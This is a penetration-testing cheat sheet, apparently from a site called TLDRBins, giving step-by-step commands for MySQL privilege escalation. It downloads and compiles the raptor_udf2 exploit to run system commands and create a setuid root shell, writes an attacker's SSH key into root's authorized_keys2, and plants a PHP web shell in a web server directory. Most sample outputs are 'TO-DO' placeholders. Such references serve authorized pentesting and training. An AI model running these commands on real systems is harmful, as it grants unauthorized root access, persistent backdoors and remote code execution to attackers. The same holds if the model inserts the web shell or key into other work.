TLDRBins TLDRBins / MySQL Privilege Escalation

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Abuse #1: User Defined Function (UDF)

# Get the raptor_udf2.c
wget https://www.exploit-db.com/raw/1518 -O raptor_udf2.c

Sample Output:
TO-DO
# Compile the source script
gcc -g -c raptor_udf2.c

Sample Output:
TO-DO
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Sample Output:
TO-DO
# Copy to target folder
cp raptor_udf2.so /dev/shm/raptor_udf2.so

Sample Output:
TO-DO
# Connect to database as root
mysql -u root -p<PASSWORD> mysql

Sample Output:
TO-DO
# UDF
create table foo(line blob);

Sample Output:
TO-DO
insert into foo values(load_file('/dev/shm/raptor_udf2.so'));

Sample Output:
TO-DO
# Get plug-in directory
show variables like '%plugin%';

Sample Output:
TO-DO
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+

Sample Output:
TO-DO
# Copy the plugin_dir value
select * from foo into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so'; 

Sample Output:
TO-DO
create function do_system returns integer soname 'raptor_udf2.so';

Sample Output:
TO-DO
# RCE
select do_system('cp /bin/bash /tmp/shell; chmod 4777 /tmp/shell');

Sample Output:
TO-DO

Abuse #2: Add SSH Public Key to root

# Connect to database as root
mysql -u root -p'<PASSWORD>' mysql

Sample Output:
TO-DO
# Check current user
select current_user();

Sample Output:
TO-DO
# Check privilege
show grants for root@localhost;

Sample Output:
TO-DO
# If mysql file write is not able to append or overwrite authorized_keys
select "<PUB_KEY>" into outfile "/root/.ssh/authorized_keys2";

Sample Output:
TO-DO

Abuse #3: Create php File from Database to RCE

create table test(stuff text);

Sample Output:
TO-DO
insert into test values('<?php system($_REQUEST["cmd"]); ?>');

Sample Output:
TO-DO
select * from test into dumpfile 'C:\\xampp\\htdocs\\cmd.php';

Sample Output:
TO-DO